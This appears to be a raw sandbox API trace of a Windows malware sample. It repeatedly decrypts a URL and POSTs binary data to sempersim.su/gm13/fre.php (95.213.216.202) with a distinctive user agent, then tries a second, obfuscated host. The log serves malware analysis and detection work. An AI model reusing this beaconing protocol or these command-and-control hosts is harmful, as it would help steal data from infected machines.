[0107.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0107.790] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0107.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0107.791] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0107.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0107.794] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0107.794] GetProcessHeap () returned 0x620000 [0107.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0107.794] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c398*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0107.796] GetProcessHeap () returned 0x620000 [0107.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b580 [0107.796] socket (af=2, type=1, protocol=6) returned 0x298 [0107.796] connect (s=0x298, name=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0107.866] FreeAddrInfoW (pAddrInfo=0x63c398*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0107.866] GetProcessHeap () returned 0x620000 [0107.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0107.866] GetProcessHeap () returned 0x620000 [0107.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0107.867] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0107.868] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0107.868] GetProcessHeap () returned 0x620000 [0107.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0107.869] GetProcessHeap () returned 0x620000 [0107.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0107.869] GetProcessHeap () returned 0x620000 [0107.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6435f0 [0107.869] GetProcessHeap () returned 0x620000 [0107.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0107.870] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0107.871] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0107.871] GetProcessHeap () returned 0x620000 [0107.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0107.871] GetProcessHeap () returned 0x620000 [0107.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0107.872] send (s=0x298, buf=0x636340*, len=237, flags=0) returned 237 [0107.873] send (s=0x298, buf=0x6421e0*, len=159, flags=0) returned 159 [0107.873] GetProcessHeap () returned 0x620000 [0107.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0107.873] recv (in: s=0x298, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0108.607] GetProcessHeap () returned 0x620000 [0108.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0108.608] GetProcessHeap () returned 0x620000 [0108.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435f0 | out: hHeap=0x620000) returned 1 [0108.608] GetProcessHeap () returned 0x620000 [0108.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0108.609] GetProcessHeap () returned 0x620000 [0108.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0108.609] closesocket (s=0x298) returned 0 [0108.610] GetProcessHeap () returned 0x620000 [0108.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b580 | out: hHeap=0x620000) returned 1 [0108.610] GetProcessHeap () returned 0x620000 [0108.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0108.610] GetProcessHeap () returned 0x620000 [0108.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6433f8 | out: hHeap=0x620000) returned 1 [0108.611] GetProcessHeap () returned 0x620000 [0108.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0108.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11a4) returned 0x298 [0108.613] Sleep (dwMilliseconds=0xea60) [0108.620] GetProcessHeap () returned 0x620000 [0108.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643560 [0108.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.621] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0108.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.627] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0108.636] GetProcessHeap () returned 0x620000 [0108.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0108.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.637] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0108.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.638] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0108.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.639] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0108.640] GetProcessHeap () returned 0x620000 [0108.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0108.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.641] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643560, pdwDataLen=0x19fcfc | out: pbData=0x643560, pdwDataLen=0x19fcfc) returned 1 [0108.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.642] CryptDestroyKey (hKey=0x62d190) returned 1 [0108.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.643] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0108.643] GetProcessHeap () returned 0x620000 [0108.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0108.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0108.644] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0108.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0108.645] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0108.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0108.646] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0108.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0108.648] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0108.648] GetProcessHeap () returned 0x620000 [0108.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0108.648] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0108.648] GetProcessHeap () returned 0x620000 [0108.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0108.648] GetProcessHeap () returned 0x620000 [0108.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0108.649] GetProcessHeap () returned 0x620000 [0108.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0108.649] GetProcessHeap () returned 0x620000 [0108.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0108.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.650] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0108.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.665] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0108.672] GetProcessHeap () returned 0x620000 [0108.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0108.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.673] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0108.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.674] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0108.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.675] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0108.675] GetProcessHeap () returned 0x620000 [0108.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0108.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.677] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0108.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.677] CryptDestroyKey (hKey=0x62d710) returned 1 [0108.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0108.678] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0108.678] GetProcessHeap () returned 0x620000 [0108.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0108.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0108.679] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0108.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0108.680] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0108.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0108.681] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0108.681] GetProcessHeap () returned 0x620000 [0108.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0108.681] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63bfb0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec58*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0108.682] GetProcessHeap () returned 0x620000 [0108.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5f0 [0108.682] socket (af=2, type=1, protocol=6) returned 0x29c [0108.682] connect (s=0x29c, name=0x63ec58*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0108.737] FreeAddrInfoW (pAddrInfo=0x63bfb0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec58*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0108.737] GetProcessHeap () returned 0x620000 [0108.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0108.737] GetProcessHeap () returned 0x620000 [0108.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0108.739] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0108.741] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0108.741] GetProcessHeap () returned 0x620000 [0108.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0108.741] GetProcessHeap () returned 0x620000 [0108.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0108.742] GetProcessHeap () returned 0x620000 [0108.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642e58 [0108.742] GetProcessHeap () returned 0x620000 [0108.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0108.743] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0108.745] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0108.746] GetProcessHeap () returned 0x620000 [0108.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0108.746] GetProcessHeap () returned 0x620000 [0108.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0108.747] send (s=0x29c, buf=0x636340*, len=237, flags=0) returned 237 [0108.747] send (s=0x29c, buf=0x6421e0*, len=159, flags=0) returned 159 [0108.748] GetProcessHeap () returned 0x620000 [0108.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0108.748] recv (in: s=0x29c, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0110.331] GetProcessHeap () returned 0x620000 [0110.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0110.331] GetProcessHeap () returned 0x620000 [0110.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e58 | out: hHeap=0x620000) returned 1 [0110.332] GetProcessHeap () returned 0x620000 [0110.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0110.332] GetProcessHeap () returned 0x620000 [0110.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0110.332] closesocket (s=0x29c) returned 0 [0110.333] GetProcessHeap () returned 0x620000 [0110.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5f0 | out: hHeap=0x620000) returned 1 [0110.333] GetProcessHeap () returned 0x620000 [0110.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0110.333] GetProcessHeap () returned 0x620000 [0110.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0110.333] GetProcessHeap () returned 0x620000 [0110.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0110.334] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1250) returned 0x29c [0110.335] Sleep (dwMilliseconds=0xea60) [0110.338] GetProcessHeap () returned 0x620000 [0110.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e58 [0110.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.339] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0110.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.345] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0110.352] GetProcessHeap () returned 0x620000 [0110.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0110.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.353] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0110.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.363] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0110.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.364] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0110.364] GetProcessHeap () returned 0x620000 [0110.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0110.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.366] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e58, pdwDataLen=0x19fcfc | out: pbData=0x642e58, pdwDataLen=0x19fcfc) returned 1 [0110.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.367] CryptDestroyKey (hKey=0x62d190) returned 1 [0110.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.368] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0110.368] GetProcessHeap () returned 0x620000 [0110.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x636288 [0110.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0110.369] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0110.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0110.372] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0110.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0110.373] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0110.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0110.374] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0110.374] GetProcessHeap () returned 0x620000 [0110.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0110.374] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0110.375] GetProcessHeap () returned 0x620000 [0110.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0110.375] GetProcessHeap () returned 0x620000 [0110.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0110.375] GetProcessHeap () returned 0x620000 [0110.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e58 | out: hHeap=0x620000) returned 1 [0110.375] GetProcessHeap () returned 0x620000 [0110.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0110.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.377] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0110.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.387] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0110.394] GetProcessHeap () returned 0x620000 [0110.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0110.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.395] CryptImportKey (in: hProv=0x63ba08, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0110.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.396] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0110.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.397] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0110.397] GetProcessHeap () returned 0x620000 [0110.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0110.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.398] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0110.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.399] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0110.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0110.400] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0110.400] GetProcessHeap () returned 0x620000 [0110.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x636288 [0110.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0110.407] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0110.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0110.408] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0110.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0110.409] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0110.409] GetProcessHeap () returned 0x620000 [0110.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633340 [0110.409] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c550*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0110.411] GetProcessHeap () returned 0x620000 [0110.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b500 [0110.411] socket (af=2, type=1, protocol=6) returned 0x2a0 [0110.411] connect (s=0x2a0, name=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0110.461] FreeAddrInfoW (pAddrInfo=0x63c550*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0110.461] GetProcessHeap () returned 0x620000 